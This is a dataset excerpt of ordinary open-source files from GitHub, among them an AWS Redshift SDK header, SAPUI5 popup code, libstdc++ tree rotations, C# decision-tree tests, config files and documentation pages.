text
stringlengths 2
100k
| meta
dict |
---|---|
/**
* Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
* SPDX-License-Identifier: Apache-2.0.
*/
#pragma once
#include <aws/redshift/Redshift_EXPORTS.h>
#include <aws/core/utils/memory/stl/AWSString.h>
#include <aws/core/utils/memory/stl/AWSVector.h>
#include <aws/redshift/model/ResponseMetadata.h>
#include <aws/redshift/model/ReservedNodeOffering.h>
#include <utility>
namespace Aws
{
template<typename RESULT_TYPE>
class AmazonWebServiceResult;
namespace Utils
{
namespace Xml
{
class XmlDocument;
} // namespace Xml
} // namespace Utils
namespace Redshift
{
namespace Model
{
/**
* <p/><p><h3>See Also:</h3> <a
* href="http://docs.aws.amazon.com/goto/WebAPI/redshift-2012-12-01/ReservedNodeOfferingsMessage">AWS
* API Reference</a></p>
*/
class AWS_REDSHIFT_API DescribeReservedNodeOfferingsResult
{
public:
DescribeReservedNodeOfferingsResult();
DescribeReservedNodeOfferingsResult(const Aws::AmazonWebServiceResult<Aws::Utils::Xml::XmlDocument>& result);
DescribeReservedNodeOfferingsResult& operator=(const Aws::AmazonWebServiceResult<Aws::Utils::Xml::XmlDocument>& result);
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline const Aws::String& GetMarker() const{ return m_marker; }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline void SetMarker(const Aws::String& value) { m_marker = value; }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline void SetMarker(Aws::String&& value) { m_marker = std::move(value); }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline void SetMarker(const char* value) { m_marker.assign(value); }
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline DescribeReservedNodeOfferingsResult& WithMarker(const Aws::String& value) { SetMarker(value); return *this;}
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline DescribeReservedNodeOfferingsResult& WithMarker(Aws::String&& value) { SetMarker(std::move(value)); return *this;}
/**
* <p>A value that indicates the starting point for the next set of response
* records in a subsequent request. If a value is returned in a response, you can
* retrieve the next set of records by providing this returned marker value in the
* <code>Marker</code> parameter and retrying the command. If the
* <code>Marker</code> field is empty, all response records have been retrieved for
* the request. </p>
*/
inline DescribeReservedNodeOfferingsResult& WithMarker(const char* value) { SetMarker(value); return *this;}
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline const Aws::Vector<ReservedNodeOffering>& GetReservedNodeOfferings() const{ return m_reservedNodeOfferings; }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline void SetReservedNodeOfferings(const Aws::Vector<ReservedNodeOffering>& value) { m_reservedNodeOfferings = value; }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline void SetReservedNodeOfferings(Aws::Vector<ReservedNodeOffering>&& value) { m_reservedNodeOfferings = std::move(value); }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& WithReservedNodeOfferings(const Aws::Vector<ReservedNodeOffering>& value) { SetReservedNodeOfferings(value); return *this;}
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& WithReservedNodeOfferings(Aws::Vector<ReservedNodeOffering>&& value) { SetReservedNodeOfferings(std::move(value)); return *this;}
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& AddReservedNodeOfferings(const ReservedNodeOffering& value) { m_reservedNodeOfferings.push_back(value); return *this; }
/**
* <p>A list of <code>ReservedNodeOffering</code> objects.</p>
*/
inline DescribeReservedNodeOfferingsResult& AddReservedNodeOfferings(ReservedNodeOffering&& value) { m_reservedNodeOfferings.push_back(std::move(value)); return *this; }
inline const ResponseMetadata& GetResponseMetadata() const{ return m_responseMetadata; }
inline void SetResponseMetadata(const ResponseMetadata& value) { m_responseMetadata = value; }
inline void SetResponseMetadata(ResponseMetadata&& value) { m_responseMetadata = std::move(value); }
inline DescribeReservedNodeOfferingsResult& WithResponseMetadata(const ResponseMetadata& value) { SetResponseMetadata(value); return *this;}
inline DescribeReservedNodeOfferingsResult& WithResponseMetadata(ResponseMetadata&& value) { SetResponseMetadata(std::move(value)); return *this;}
private:
Aws::String m_marker;
Aws::Vector<ReservedNodeOffering> m_reservedNodeOfferings;
ResponseMetadata m_responseMetadata;
};
} // namespace Model
} // namespace Redshift
} // namespace Aws
| {
"pile_set_name": "Github"
} |
<!-- Copyright 2014 Google Inc. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// -->
<!DOCTYPE html>
<title>Unit Test of e2e.FastModulus</title>
<script src="../../../../../javascript/closure/base.js"></script>
<script src="test_js_deps-runfiles.js"></script>
<script>
goog.require('goog.testing.jsunit');
goog.require('e2e.BigNum');
goog.require('e2e.bigNumTestData');
goog.require('e2e.BigPrimeNum');
goog.require('e2e.FastModulus');
</script>
<script>
var P256 = new e2e.BigNum(e2e.bigNumTestData.P_256);
var P512 = P256.multiply(P256);
//
// Note that additional tests have moved to ecc/fastmodulus_test.html
//
/**
* Ensure that FastModulus.FFFFFF works on all bignums whose high
* 24 bits are 1, no matter what the alignment.
*/
function testModulusFFFFFF() {
var value = new e2e.BigPrimeNum(e2e.bigNumTestData.N);
for (var i = 0; i < 24; i++) {
var modulus = value.shiftLeft(i);
var value1 = new e2e.FastModulus.FFFFFF(modulus).residue(P512);
var value2 = P512.mod(modulus);
assertTrue(value1.isEqual(value2));
}
}
/**
* Ensure that FastModulus.Ox1000000
* works on all bignums whose high
* 24 bits are 1, no matter what the alignment.
*/
function testModulus1000000() {
var value = new e2e.BigPrimeNum([1, 0, 0, 0, 0x88, 0x88, 0x89]);
for (var i = 0; i < 24; i++) {
var modulus = value.shiftLeft(i);
var value1 = new e2e.FastModulus.Ox1000000(modulus).residue(P512);
var value2 = P512.mod(modulus);
assertTrue(value1.isEqual(value2));
}
}
</script>
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env node
require('@storybook/cli/bin/index');
| {
"pile_set_name": "Github"
} |
# Definition for singly-linked list.
class ListNode(object):
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
h = ListNode(-1)
h.next = head
p, q = h, h
for _ in range(n + 1):
assert (q)
q = q.next
while q != None:
p = p.next
q = q.next
p.next = p.next.next
return h.next
def createList():
head = ListNode(0)
cur = head
for i in range(1, 10):
cur.next = ListNode(i)
cur = cur.next
return head
def printList(head):
cur = head
while cur != None:
print(cur.val, '-->', end='')
cur = cur.next
print('NULL')
if __name__ == "__main__":
head = createList()
printList(head)
res = Solution().removeNthFromEnd(head, 2)
printList(res) | {
"pile_set_name": "Github"
} |
.. MechanicalSoup documentation master file, created by
sphinx-quickstart on Sun Sep 14 18:44:39 2014.
You can adapt this file completely to your liking, but it should at least
contain the root `toctree` directive.
.. image:: ../assets/mechanical-soup-logo.png
:alt: MechanicalSoup. A Python library for automating website
interaction.
:align: center
.. This '|' generates a blank line to avoid sticking the logo to the
section.
|
Welcome to MechanicalSoup's documentation!
==========================================
A Python library for automating interaction with websites. MechanicalSoup automatically stores and sends cookies, follows redirects, and can follow links and submit forms. It doesn't do Javascript.
MechanicalSoup was created by `M Hickford
<https://github.com/hickford/>`__, who was a fond user of the
`Mechanize <https://github.com/jjlee/mechanize>`__ library.
Unfortunately, Mechanize is `incompatible with Python 3
<https://github.com/jjlee/mechanize/issues/96>`__ and its development
stalled for several years. MechanicalSoup provides a similar API, built on Python
giants `Requests <http://docs.python-requests.org/en/latest/>`__ (for
http sessions) and `BeautifulSoup
<http://www.crummy.com/software/BeautifulSoup/>`__ (for document
navigation). Since 2017 it is a project actively maintained by a small
team including `@hemberger <https://github.com/hemberger>`__ and `@moy
<https://github.com/moy/>`__.
Contents:
.. toctree::
:maxdepth: 2
introduction
tutorial
mechanicalsoup
faq
external-resources
ChangeLog
Indices and tables
==================
* :ref:`genindex`
* :ref:`modindex`
* :ref:`search`
| {
"pile_set_name": "Github"
} |
/*!
* SAP UI development toolkit for HTML5 (SAPUI5/OpenUI5)
* (c) Copyright 2009-2015 SAP SE or an SAP affiliate company.
* Licensed under the Apache License, Version 2.0 - see LICENSE.txt.
*/
// Provides class sap.ui.core.PopupSupport
sap.ui.define([ 'jquery.sap.global', './Element', './Control' ], function(jQuery, Element, Control) {
"use strict";
/**
* This class provides some methods for Popup handling. This class can be
* used as a mixin for controls that use a Popup as a local instance.
*
* @returns {sap.ui.core.PopupSupport}
* @constructor
* @private
* @alias sap.ui.core.PopupSupport
*/
var PopupSupport = function() {
this.getMetadata().addPublicMethods([ "getParentPopup", "isInPopup", "getParentPopupId", "addToPopup", "removeFromPopup" ]);
/**
* Checks if the (optional) given jQuery-object or DOM-node is within a
* Popup. If no object is given the instance of the control will be used
* to check.
*
* @param {jQuery |
* Node} [oThis] is the object that should be checked
* (optional)
* @returns {boolean} whether this control instance is part of a Popup
*/
this.isInPopup = function(oThis) {
var $ParentPopup = this.getParentPopup(oThis);
return $ParentPopup && $ParentPopup.length > 0;
};
/**
* This function returns the parent Popup if available.
*
* @param {control}
* [oThat] is an optional control instance. If another
* instance than "this" is given the corresponding control
* instance will be used to fetch the Popup.
* @returns {jQuery} [ParentPopup]
*/
this.getParentPopup = function(oThat) {
// use either given object (control or DOM-ref) or this instance
var oThis = oThat ? oThat : this;
// if oThis is an element use its DOM-ref to look for a Popup. Else
// 'oThis' is an DOM-ref therefore simply use it
var $This = jQuery(oThis instanceof sap.ui.core.Element ? oThis.getDomRef() : oThis);
// look up if there is a Popup above used DOM-ref
return $This.closest("[data-sap-ui-popup]");
};
/**
* This returns the corresponding unique ID of the parent Popup.
*
* @param {control}
* [oThat] is an optional control instance. If another
* instance than "this" is given the corresponding control
* instance will be used to fetch the Popup.
* @returns [string] ParentPopupId
*/
this.getParentPopupId = function(oThis) {
var $ParentPopup = this.getParentPopup(oThis);
return $ParentPopup.attr("data-sap-ui-popup");
};
/**
* Adds the given child Popup id to the given parent's association.
*
* @param [string]
* sParentPopupId to which the id will be added
* @param [string]
* sChildPopupId that will be added to the perant Popup
*/
this.addChildToPopup = function(sParentPopupId, sChildPopupId) {
var sEventId = "sap.ui.core.Popup.addFocusableContent-" + sParentPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId, {
id : sChildPopupId
});
};
/**
* Removes the control id to the Popup. If a dedicated Popup id is given
* then the control will be removed accordingly from this Popup. Else
* the closest Popup will be used.
*
* @param {string}
* [sPopupId] from which Popup the control should be removed
* (optional)
*/
this.removeChildFromPopup = function(sPopupId) {
if (!sPopupId) {
sPopupId = this.getPopupId();
}
// de-register id of Menu-Popup to parent-Popup to make the menu as
// focusable
var sEventId = "sap.ui.core.Popup.removeFocusableContent-" + sPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId, {
id : this.getId()
});
};
/**
* Closes a specific Popup when the control instance isn't available
*
* @param [string]
* sPopupId of Popup that should be closed
*/
this.closePopup = function(sPopupId) {
var sEventId = "sap.ui.core.Popup.closePopup-" + sPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId);
};
/**
* This function calls a popup to increase its z-index
*
* @param [string]
* sPopupId of Popup that should increase its z-index
* @param [boolean]
* bIsParent marks if a parent Popup calls its child Popups
* to increase their z-index
*/
this.increaseZIndex = function(sPopupId, bIsParent) {
var sEventId = "sap.ui.core.Popup.increaseZIndex-" + sPopupId;
sap.ui.getCore().getEventBus().publish("sap.ui", sEventId, {
isFromParentPopup : bIsParent ? bIsParent : false
});
};
/**
* This function helps Popup controls to enable a tabchaining within its
* content. For the commons.Dialog and ux3.ToolPopup there is a fake
* element at the beginning and at the end of the DOM-structure. These
* elements are used to enable a chaining. If these element are focused
* this function determines which element in the content or footer area
* has to be focused. Since those control have a content and footer area
* with buttons it has to be checked whether a button or content-element
* is available that can be focused.
*
* @param [object]
* mParameters contain all necessary parameters
* @param [object.object]
* mParameter.that is the control that calls this function.
* Needed for debug logging info
* @param [object.object]
* mParameters.event is the event that is being forwarded
* from the
* @param [object.string]
* mParameters.firstFocusable is the first focusable element
* in the control
* @param [object.string]
* mParameters.lastFocusable is the last focusable element in
* the control
* @param [object.jQuery]
* mParameters.$FocusablesContent are focusable elements in
* the content area of the control
* @param [object.jQuery]
* mParameters.$FocusablesFooter are focusable elements in
* the footer area of the control (e.g. buttons)
*/
this.focusTabChain = function(mParameters) {
var oSourceDomRef = mParameters.event.target,
sName = mParameters.that.getMetadata().getName(),
oFocusDomRef;
if ((!!!mParameters.$FocusablesContent || !!!mParameters.$FocusablesFooter) ||
(!mParameters.$FocusablesContent.length && !mParameters.$FocusablesFooter.length)) {
// if there is neither content nor footer content (yet) simply do nothing
return;
}
/*
* It's not needed to check if buttons are set since
* jQuery(":focusable", jQuery.sap.byId(this.getId() + "-fhfe")) or
* jQuery(":sapFocusable", jQuery.sap.byId(this.getId() + "-fhfe"))
* returns an empty array. Therefore these elements won't be found
* via 'lastFocusableDomRef()'
*/
if (oSourceDomRef.id === mParameters.firstFocusable) {
// the FocusHandlingFirstElement was focused and thus the focus
// should move to the last element.
jQuery.sap.log.debug("First dummy focus element was focused", "", sName);
if (mParameters.$FocusablesFooter.length > 0) {
jQuery.sap.log.debug("Last footer element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesFooter[mParameters.$FocusablesFooter.length - 1];
} else {
jQuery.sap.log.debug("Last content element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesContent[mParameters.$FocusablesContent.length - 1];
}
} else if (oSourceDomRef.id === mParameters.lastFocusable) {
// the FocusHandlingEndElement was focused and thus the focus
// should move to the first element.
jQuery.sap.log.debug("Last dummy focus element was focues", "", sName);
if (mParameters.$FocusablesContent.length > 0) {
jQuery.sap.log.debug("First content element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesContent[0];
} else {
jQuery.sap.log.debug("First footer element will be focused", "", sName);
oFocusDomRef = mParameters.$FocusablesFooter[0];
}
}
if (oFocusDomRef) {
/*
* This check especially for IE9 is needed because when IE9 is
* used together with JAWS the element that will be focused
* isn't read when the focus happens too fast. Therefore a delay
* is added to JAWS can read the newly focused element.
*/
var iDelay = sap.ui.Device.browser.msie && sap.ui.Device.browser.version === 9 ? 100 : 0;
jQuery.sap.delayedCall(iDelay, this, function() {
// if the element is a control the focus should be called
// via the control
// especially if the control has an individual focus DOM-ref
var oControl = sap.ui.getCore().byId(oFocusDomRef.id);
if (oControl instanceof Control) {
jQuery.sap.log.debug("Focus will be handled by " + oControl.getMetadata().getName(), "", sName);
} else {
jQuery.sap.log.debug("oFocusDomRef will be focused", "", sName);
}
jQuery.sap.focus(oControl ? oControl : oFocusDomRef);
return oControl ? oControl.getId() : oFocusDomRef.id;
});
}
};
};
return PopupSupport;
}, /* bExport= */true);
| {
"pile_set_name": "Github"
} |
<!DOCTYPE html>
<html>
<head>
<title>The change you wanted was rejected (422)</title>
<style type="text/css">
body { background-color: #fff; color: #666; text-align: center; font-family: arial, sans-serif; }
div.dialog {
width: 25em;
padding: 0 4em;
margin: 4em auto 0 auto;
border: 1px solid #ccc;
border-right-color: #999;
border-bottom-color: #999;
}
h1 { font-size: 100%; color: #f00; line-height: 1.5em; }
</style>
</head>
<body>
<!-- This file lives in public/422.html -->
<div class="dialog">
<h1>The change you wanted was rejected.</h1>
<p>Maybe you tried to change something you didn't have access to.</p>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
{
"API_URL": "https://pwa-workshop-api.herokuapp.com",
"VAPID_PUBLIC_KEY": "BM88mSlUg4mvjcPK5QrzRfQzow91F47iEazCnoTBQ8Hv_AVrJviLcnrNumTK319qWOt43sgOzBJs6UrdOW5IxHg"
}
| {
"pile_set_name": "Github"
} |
// -*- C++ -*-
// Copyright (C) 2005, 2006 Free Software Foundation, Inc.
//
// This file is part of the GNU ISO C++ Library. This library is free
// software; you can redistribute it and/or modify it under the terms
// of the GNU General Public License as published by the Free Software
// Foundation; either version 2, or (at your option) any later
// version.
// This library is distributed in the hope that it will be useful, but
// WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
// General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with this library; see the file COPYING. If not, write to
// the Free Software Foundation, 59 Temple Place - Suite 330, Boston,
// MA 02111-1307, USA.
// As a special exception, you may use this file as part of a free
// software library without restriction. Specifically, if other files
// instantiate templates or use macros or inline functions from this
// file, or you compile this file and link it with other files to
// produce an executable, this file does not by itself cause the
// resulting executable to be covered by the GNU General Public
// License. This exception does not however invalidate any other
// reasons why the executable file might be covered by the GNU General
// Public License.
// Copyright (C) 2004 Ami Tavory and Vladimir Dreizin, IBM-HRL.
// Permission to use, copy, modify, sell, and distribute this software
// is hereby granted without fee, provided that the above copyright
// notice appears in all copies, and that both that copyright notice
// and this permission notice appear in supporting documentation. None
// of the above authors, nor IBM Haifa Research Laboratories, make any
// representation about the suitability of this software for any
// purpose. It is provided "as is" without express or implied
// warranty.
/**
* @file rotate_fn_imps.hpp
* Contains imps for rotating nodes.
*/
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
rotate_left(node_pointer p_x)
{
node_pointer p_y = p_x->m_p_right;
p_x->m_p_right = p_y->m_p_left;
if (p_y->m_p_left != NULL)
p_y->m_p_left->m_p_parent = p_x;
p_y->m_p_parent = p_x->m_p_parent;
if (p_x == m_p_head->m_p_parent)
m_p_head->m_p_parent = p_y;
else if (p_x == p_x->m_p_parent->m_p_left)
p_x->m_p_parent->m_p_left = p_y;
else
p_x->m_p_parent->m_p_right = p_y;
p_y->m_p_left = p_x;
p_x->m_p_parent = p_y;
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_x);)
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_y);)
apply_update(p_x, (node_update* )this);
apply_update(p_x->m_p_parent, (node_update* )this);
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
rotate_right(node_pointer p_x)
{
node_pointer p_y = p_x->m_p_left;
p_x->m_p_left = p_y->m_p_right;
if (p_y->m_p_right != NULL)
p_y->m_p_right->m_p_parent = p_x;
p_y->m_p_parent = p_x->m_p_parent;
if (p_x == m_p_head->m_p_parent)
m_p_head->m_p_parent = p_y;
else if (p_x == p_x->m_p_parent->m_p_right)
p_x->m_p_parent->m_p_right = p_y;
else
p_x->m_p_parent->m_p_left = p_y;
p_y->m_p_right = p_x;
p_x->m_p_parent = p_y;
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_x);)
_GLIBCXX_DEBUG_ONLY(assert_node_consistent(p_y);)
apply_update(p_x, (node_update* )this);
apply_update(p_x->m_p_parent, (node_update* )this);
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
rotate_parent(node_pointer p_nd)
{
node_pointer p_parent = p_nd->m_p_parent;
if (p_nd == p_parent->m_p_left)
rotate_right(p_parent);
else
rotate_left(p_parent);
_GLIBCXX_DEBUG_ASSERT(p_parent->m_p_parent = p_nd);
_GLIBCXX_DEBUG_ASSERT(p_nd->m_p_left == p_parent ||
p_nd->m_p_right == p_parent);
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
apply_update(node_pointer /*p_nd*/, null_node_update_pointer /*p_update*/)
{ }
PB_DS_CLASS_T_DEC
template<typename Node_Update_>
inline void
PB_DS_CLASS_C_DEC::
apply_update(node_pointer p_nd, Node_Update_* /*p_update*/)
{
node_update::operator()(
node_iterator(p_nd),
const_node_iterator(static_cast<node_pointer>(NULL)));
}
PB_DS_CLASS_T_DEC
template<typename Node_Update_>
inline void
PB_DS_CLASS_C_DEC::
update_to_top(node_pointer p_nd, Node_Update_* p_update)
{
while (p_nd != m_p_head)
{
apply_update(p_nd, p_update);
p_nd = p_nd->m_p_parent;
}
}
PB_DS_CLASS_T_DEC
inline void
PB_DS_CLASS_C_DEC::
update_to_top(node_pointer /*p_nd*/, null_node_update_pointer /*p_update*/)
{ }
| {
"pile_set_name": "Github"
} |
using System.Diagnostics;
using System.Linq;
using Microsoft.VisualStudio.TestTools.UnitTesting;
using SharpLearning.Containers.Matrices;
using SharpLearning.DecisionTrees.Learners;
using SharpLearning.Metrics.Classification;
namespace SharpLearning.DecisionTrees.Test.Learners
{
[TestClass]
public class ClassificationDecisionTreeLearnerTest
{
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Reuse_No_Valid_Split()
{
var (observations, targets) = DataSetUtilities.LoadGlassDataSet();
var sut = new ClassificationDecisionTreeLearner();
// train initial model.
sut.Learn(observations, targets);
// reuse learner, with smaller data that provides no valid split.
var onlyUniqueTargetValue = 1.0;
var onlyOneUniqueObservations = (F64Matrix)observations.Rows(0, 1, 2, 3, 4);
var onlyOneUniquetargets = Enumerable.Range(0, onlyOneUniqueObservations.RowCount).Select(v => onlyUniqueTargetValue).ToArray();
var model = sut.Learn(onlyOneUniqueObservations, onlyOneUniquetargets);
var predictions = model.Predict(onlyOneUniqueObservations);
// no valid split, so should result in the model always returning the onlyUniqueTargetValue.
for (int i = 0; i < predictions.Length; i++)
{
Assert.AreEqual(onlyUniqueTargetValue, predictions[i], 0.0001);
}
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_Depth_100()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude(100);
Assert.AreEqual(0.038461538461538464, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude(1);
Assert.AreEqual(0.23076923076923078, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_5()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude(5);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_100()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass(100);
Assert.AreEqual(0.0, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass(1);
Assert.AreEqual(0.5280373831775701, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_5()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass(5);
Assert.AreEqual(0.16355140186915887, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_Depth_100_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(100, 1);
Assert.AreEqual(0.038461538461538464, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_1_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(1, 1);
Assert.AreEqual(0.23076923076923078, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_5_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(5, 1);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_100_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(100, 1);
Assert.AreEqual(0.0, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_1_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(1, 1);
Assert.AreEqual(0.5280373831775701, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_5_Weight_1()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(5, 1);
Assert.AreEqual(0.16355140186915887, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_Depth_100_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(100, 10);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Aptitude_depth_5_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(5, 10);
Assert.AreEqual(0.076923076923076927, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_100_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(100, 10);
Assert.AreEqual(0.070093457943925228, error, 0.0000001);
}
[TestMethod]
public void ClassificationDecisionTreeLearner_Learn_Glass_Depth_5_Weight_10()
{
var error = ClassificationDecisionTreeLearner_Learn_Glass_Weighted(5, 10);
Assert.AreEqual(0.14018691588785046, error, 0.0000001);
}
double ClassificationDecisionTreeLearner_Learn_Glass(int treeDepth)
{
var (observations, targets) = DataSetUtilities.LoadGlassDataSet();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, observations.ColumnCount, 0.001, 42);
var model = sut.Learn(observations, targets);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
var error = evaluator.Error(targets, predictions);
return error;
}
double ClassificationDecisionTreeLearner_Learn_Aptitude(int treeDepth)
{
var (observations, targets) = DataSetUtilities.LoadAptitudeDataSet();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, 2, 0.001, 42);
var model = sut.Learn(observations, targets);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
var error = evaluator.Error(targets, predictions);
return error;
}
double ClassificationDecisionTreeLearner_Learn_Glass_Weighted(int treeDepth, double weight)
{
var (observations, targets) = DataSetUtilities.LoadGlassDataSet();
var weights = targets.Select(v => Weight(v, 1, weight)).ToArray();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, observations.ColumnCount, 0.001, 42);
var model = sut.Learn(observations, targets, weights);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
Trace.WriteLine(evaluator.ErrorString(targets, predictions));
var error = evaluator.Error(targets, predictions);
return error;
}
double ClassificationDecisionTreeLearner_Learn_Aptitude_Weighted(int treeDepth, double weight)
{
var (observations, targets) = DataSetUtilities.LoadAptitudeDataSet();
var weights = targets.Select(v => Weight(v, 0, weight)).ToArray();
var sut = new ClassificationDecisionTreeLearner(treeDepth, 1, 2, 0.001, 42);
var model = sut.Learn(observations, targets, weights);
var predictions = model.Predict(observations);
var evaluator = new TotalErrorClassificationMetric<double>();
Trace.WriteLine(evaluator.ErrorString(targets, predictions));
var error = evaluator.Error(targets, predictions);
return error;
}
public double Weight(double v, double targetToWeigh, double weight)
{
if (v == targetToWeigh)
return weight;
return 1.0;
}
}
}
| {
"pile_set_name": "Github"
} |
{
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'agent': {
'()': 'volttron.platform.agent.utils.AgentFormatter',
},
},
'handlers': {
'rotating': {
'class': 'logging.handlers.TimedRotatingFileHandler',
'level': 'INFO',
'formatter': 'agent',
'filename': 'volttron.log',
'encoding': 'utf-8',
'when': 'midnight',
'backupCount': 7,
},
},
'root': {
'handlers': ['rotating'],
'level': 'INFO',
},
}
| {
"pile_set_name": "Github"
} |
<html>
<head>
<title>The Grammar</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="theme/style.css" type="text/css">
</head>
<body>
<table width="100%" border="0" background="theme/bkd2.gif" cellspacing="2">
<tr>
<td width="10">
</td>
<td width="85%">
<font size="6" face="Verdana, Arial, Helvetica, sans-serif"><b>The Grammar</b></font>
</td>
<td width="112"><a href="http://spirit.sf.net"><img src="theme/spirit.gif" width="112" height="48" align="right" border="0"></a></td>
</tr>
</table>
<br>
<table border="0">
<tr>
<td width="10"></td>
<td width="30"><a href="../index.html"><img src="theme/u_arr.gif" border="0"></a></td>
<td width="30"><a href="scanner.html"><img src="theme/l_arr.gif" border="0"></a></td>
<td width="30"><a href="subrules.html"><img src="theme/r_arr.gif" border="0"></a></td>
</tr>
</table>
